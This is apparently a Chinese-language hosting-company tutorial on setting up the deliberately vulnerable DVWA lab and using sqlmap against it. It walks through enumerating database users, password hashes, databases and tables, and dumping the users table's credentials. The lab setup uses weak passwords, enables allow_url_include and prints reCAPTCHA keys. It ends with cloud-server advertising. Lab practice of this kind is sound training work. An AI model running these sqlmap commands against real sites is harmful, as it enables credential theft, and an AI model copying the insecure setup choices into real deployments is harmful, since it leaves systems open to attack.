十年網站開發(fā)經驗 + 多家企業(yè)客戶 + 靠譜的建站團隊
量身定制 + 運營維護+專業(yè)推廣+無憂售后,網站問題一站解決
下文內容主要給大家?guī)頊y試演練系統(tǒng)DVWA流程,這里所講到的知識,與書籍略有不同,都是創(chuàng)新互聯專業(yè)技術人員在與用戶接觸過程中,總結出來的,具有一定的經驗分享價值,希望給廣大讀者帶來幫助。

一、部署***測試演練系統(tǒng)DVWA
1. 下載DVWA軟件包
官方下載地址:http://www.dvwa.co.uk/,當前最新版本為:DVWA-1.9
wgethttps://codeload.github.com/ethicalhack3r/DVWA/zip/master
2. 部署linux環(huán)境
yum install -y httpd mysql mysql-server php php-mysql php-gd
3. 開啟httpd和mysqld服務
service httpd start
service mysqld start

4. 測試htttp對php的解析,瀏覽器訪問http://ip/test.php正常
vim /var/www/html/test.php
寫入:
phpinfo();
?>
5. 修改mysql的密碼
mysqladmin -uroot password "123456"
6. 將DVWA-1.9.zip解壓至/var/www/html,并修改屬主為apache
unzip DVWA-1.9.zip -d /var/www/html
chown -R apache:apache /var/www/html/DVWA-1.9
7. 修改DVWA配置文件數據庫密碼為123456
vim /var/www/html/DVWA-1.9/config/config.inc.php
修改密碼:
$_DVWA[ 'db_password' ] = '123456';

8. 進入DVWA的web安裝界面,http://ip/DVWA-1.9/setup.php,發(fā)現報錯

解決方法:
1)編輯php的配置文件 vim /etc/php.ini
allow_url_include = On

2)編輯DVWA配置文件 vim /var/www/html/DVWA-1.9/config/config.inc.php
找到創(chuàng)建公鑰和私鑰的鏈接:https://www.google.com/recaptcha/admin/create申請后填寫在配置文件中:
公鑰:6LcY-BUUAAAAAGJ5Q0Y5zPEccMG5vCeHI1Lnwqyb
私鑰:6LcY-BUUAAAAAPvvHmppQRscfHuV0QPPuM5-Px3k



9. 重啟http,使修改的配置文件生效,刷新web界面,錯誤消除
service httpd restart

10. 點擊Create/Reset Database,自動跳轉到登錄界面,默認用戶名/密碼:admin/password
至此,DVWA已部署完成

二、安裝SQLmap漏洞查看工具
1. 官方下載:http://sqlmap.org/http://sqlmap.org/
版本:sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz
2. 解壓sqlmap,并執(zhí)行
說明:該工具是用python寫的,需安裝python,它不是編譯型語言,而是執(zhí)行性語言,直接運行

命令 tar -zxvf sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz
命令 ./sqlmap.py

3. 設置命令別名,修改vim /etc/profile,直接使用sqlmap命令
命令 alias sqlmap='python /usr/local/src/sqlmapproject-sqlmap-7eab1bc/sqlmap.py'
命令 source /etc/profile

三、實戰(zhàn)
實戰(zhàn)1:枚舉登錄MYSQL數據的用戶名與密碼
實戰(zhàn)2:枚舉所有數據庫
實戰(zhàn)3:枚舉指定數據庫的數據表
實戰(zhàn)4:獲取指定數據庫和表中所有列的信息
實戰(zhàn)5:枚舉指定數據表中的所有用戶名與密碼
環(huán)境準備:
1)登錄http://192.168.1.124/DVWA-1.9,將安全級別設置為最低;
2)開啟Firefox瀏覽器TamperData插件,等待獲取cookies值;
3)在【SQL Injection】項中,提交User ID為22(地址欄出現id=22,這就是MySQL的注入點)
獲得注入點:http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#
4)TamperData彈窗獲取cookies值:security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552


實戰(zhàn)1:枚舉登錄MYSQL數據的用戶名與密碼
sqlmap語法參數:
-u :指定目標URL,即注入點
--cookies:當前會話的cookies值
-b:獲取數據庫類型,檢索數據庫管理系統(tǒng)標識
--current-db:獲取當前數據庫
--current-user:獲取當前登錄數據庫使用的用戶
命令:
sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' -b --current-db --current-user
說明:根據提示回復Y,繼續(xù)

結果:得到當前數據庫為dawa,使用的用戶為root@localhost

實戰(zhàn)2:枚舉所有數據庫
sqlmap語法參數:
--users:枚舉數據庫用戶名
-password:枚舉數據庫用戶的密碼(hash)
命令:
sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" --users --password

說明:選擇目錄下字典文件,暴力破解

結果:數據庫用戶名為root,密碼也有明文形式123456

實戰(zhàn)3:枚舉數據庫和指定數據庫的數據表
sqlmap語法參數:
--dbs:枚舉當前數據庫
命令:
sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" --dbs
結果:mysql下所有的數據庫

命令:
sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" -D dvwa --tables
結果:dvwa庫中,所有的表

實戰(zhàn)4:獲取指定數據庫和表中所有列的信息
sqlmap語法參數:
-D:指定的數據庫
-T:指定數據庫中的數據表
--columns:獲取列的信息
命令:
sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" -D dvwa -T users --columns
結果:dvwa庫,users表中所有字段信息

實戰(zhàn)5:枚舉指定數據表中的所有用戶名與密碼
sqlmap語法參數:
-C:枚舉數據表中的列
--dump:存儲數據表項
命令:
sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" -D dvwa -T users -C user,password --dump
結果:dvwa庫,users表中user字段和password字段信息,最后表中信息轉存文件中

對于以上關于測試演練系統(tǒng)DVWA流程,如果大家還有更多需要了解的可以持續(xù)關注我們創(chuàng)新互聯的行業(yè)推新,如需獲取專業(yè)解答,可在官網聯系售前售后的,希望該文章可給大家?guī)硪欢ǖ闹R更新。
另外有需要云服務器可以了解下創(chuàng)新互聯cdcxhl.cn,海內外云服務器15元起步,三天無理由+7*72小時售后在線,公司持有idc許可證,提供“云服務器、裸金屬服務器、高防服務器、香港服務器、美國服務器、虛擬主機、免備案服務器”等云主機租用服務以及企業(yè)上云的綜合解決方案,具有“安全穩(wěn)定、簡單易用、服務可用性高、性價比高”等特點與優(yōu)勢,專為企業(yè)上云打造定制,能夠滿足用戶豐富、多元化的應用場景需求。